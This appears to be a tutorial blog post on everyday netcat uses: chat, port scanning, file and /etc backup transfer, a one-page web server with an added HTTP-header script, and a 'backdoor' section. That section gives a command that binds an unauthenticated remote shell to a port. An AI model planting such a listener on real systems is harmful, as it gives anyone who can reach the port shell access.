Netcat is a versatile networking utility that reads and writes data across network connections using the TCP/IP protocol.
It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
In this short guide I’ll quickly cover some very helpful uses of netcat.
The simplest example of netcat usage is to create a server-client chat system. In the following example it is assumed that the machine that creates the listening socket (the server) has the IP address 192.168.0.1. So, create the chat server on this machine and set it to listen on TCP port 12345 with one of the following commands (the first form is for traditional netcat, the second for variants such as OpenBSD netcat that take the port as a plain argument):
# nc -lp 12345
# nc -l 12345
If you now connect to port 12345 on that host, everything you type will be sent to the other party, which leads us to using netcat as a chat server.
Connect to it from another machine by entering this command:
# nc 192.168.0.1 12345
Now both parties can chat!
Netcat can also act as a port scanner. It does not have as many features as, say, nmap, but if you just want to see which ports are open on a given machine, you can simply do:
# nc -vzw 1 localhost 1-1000
Let’s say you want to transfer a file from machine A to machine B; you can use netcat as file-transfer software.
On machine A run one of the following, depending on your netcat variant, where 12345 is an unused port on which you want to serve the file:
# nc -lp 12345 < myfile.tar.bz2
# nc -l 12345 < myfile.tar.bz2
Then go to machine B and run this command (192.168.0.1 is machine A's IP address):
# nc 192.168.0.1 12345 > myfile.tar.bz2
The same trick backs up a whole directory tree. On machine A, pack it with tar and stream the archive into netcat:
# tar -czf - /etc/ | nc -lp 12345
Then, on machine B, pull the stream into a file:
# nc 192.168.0.1 12345 > mybackup.tar.gz
Simple Single page Web Server:
# while true; do nc -lp 8080 -q 1 < test.html; done
Now if you connect to http://YOUR-IP-ADDRESS:8080 you will see the contents of test.html. (The -q 1 option makes traditional netcat close the connection one second after the file has been sent, so the loop can accept the next client.)
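As an added example (not from the original post), here is a small POSIX shell script that wraps the single-page server so it sends a real HTTP status line and an accurate Content-Length before the file, rather than the bare file the loop above sends. It assumes an nc that accepts `-l PORT` (use `-lp PORT` with traditional netcat) and only runs the serving loop when serve_page is called explicitly.

```shell
#!/bin/sh
# Added example: a well-formed HTTP/1.0 response for the netcat single-page server.
# Not part of the original post; the nc flag syntax is an assumption about your variant.

# http_response FILE
#   Print a status line, headers and the file body. Content-Length is the
#   exact byte count of FILE, so the client knows when the page is complete.
http_response() {
    file=$1
    size=$(wc -c < "$file" | tr -d ' ')
    printf 'HTTP/1.0 200 OK\r\n'
    printf 'Content-Type: text/html; charset=utf-8\r\n'
    printf 'Content-Length: %s\r\n' "$size"
    printf 'Connection: close\r\n'
    printf '\r\n'
    cat "$file"
}

# serve_page FILE [PORT]
#   Answer one client at a time, forever (Ctrl-C to stop). Each connection
#   gets a fresh response; the client's request bytes are simply discarded.
#   Note that "nc -l PORT" binds every interface, so this is reachable from
#   any host that can route to the machine.
serve_page() {
    file=$1
    port=${2:-8080}
    while true; do
        http_response "$file" | nc -l "$port" > /dev/null   # traditional netcat: nc -lp "$port" -q 1
    done
}

# Usage (not run automatically):  serve_page test.html 8080
```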
Netcat as a Backdoor !!!
Netcat can be used as a backdoor! You can specify the shell (or, for that matter, any executable) you want netcat to run on a successful connection with the -e parameter:
# nc -lp 54321 -e /bin/bash
Now if you connect to port 54321 you will have a shell. Note that the listener is unauthenticated: anyone who can reach that port gets the same shell, running as the user that started netcat.
Getting System Information
# while true; do nc -lp 12345 -e /usr/bin/uptime; done
A user who wants to obtain the system information then issues the following command from another machine:
# nc 192.168.0.1 12345